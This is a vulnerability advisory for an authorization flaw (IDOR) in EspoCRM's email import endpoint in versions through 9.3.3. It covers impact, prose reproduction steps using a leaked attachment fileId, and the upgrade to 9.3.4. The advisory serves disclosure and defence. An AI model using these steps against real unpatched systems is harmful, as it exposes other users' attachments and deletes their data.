EspoCRM Insecure Direct Object Reference Vulnerability in Email Attachment Import Endpoint

A cross-user Insecure Direct Object Reference (IDOR) vulnerability has been identified in EspoCRM versions through 9.3.3. The issue arises in the POST /api/v1/Email/importEml endpoint, where the fileId parameter, supplied by the attacker, is used to fetch attachments without proper authorization checks. This allows authenticated users with Email:create and Import permissions to access and import another user's .eml attachment into their mailbox, while simultaneously deleting the original attachment record from the victim. The vulnerability exists because attachment IDs are often exposed in the application's user interface and API responses, making it easy to exploit.

Impact

Exploitation of this vulnerability allows for unauthorized access to another user's email attachment contents, with the imported data being used to create a new email in the attacker's mailbox. Additionally, the original attachment is deleted, causing data loss for the victim.

Reproduction

The vulnerability can be reproduced by logging in as a user with the necessary permissions to import emails but without access to read all attachments. After uploading a .eml file as a note attachment, the fileId can be extracted from the application. Then, by sending a POST request to the importEml endpoint with the extracted fileId, the attacker can import the victim's email attachment into their own mailbox, effectively reading the contents and deleting the original attachment from the victim's account.

Remediation

Users are advised to update to EspoCRM version 9.3.4, where this vulnerability has been fixed.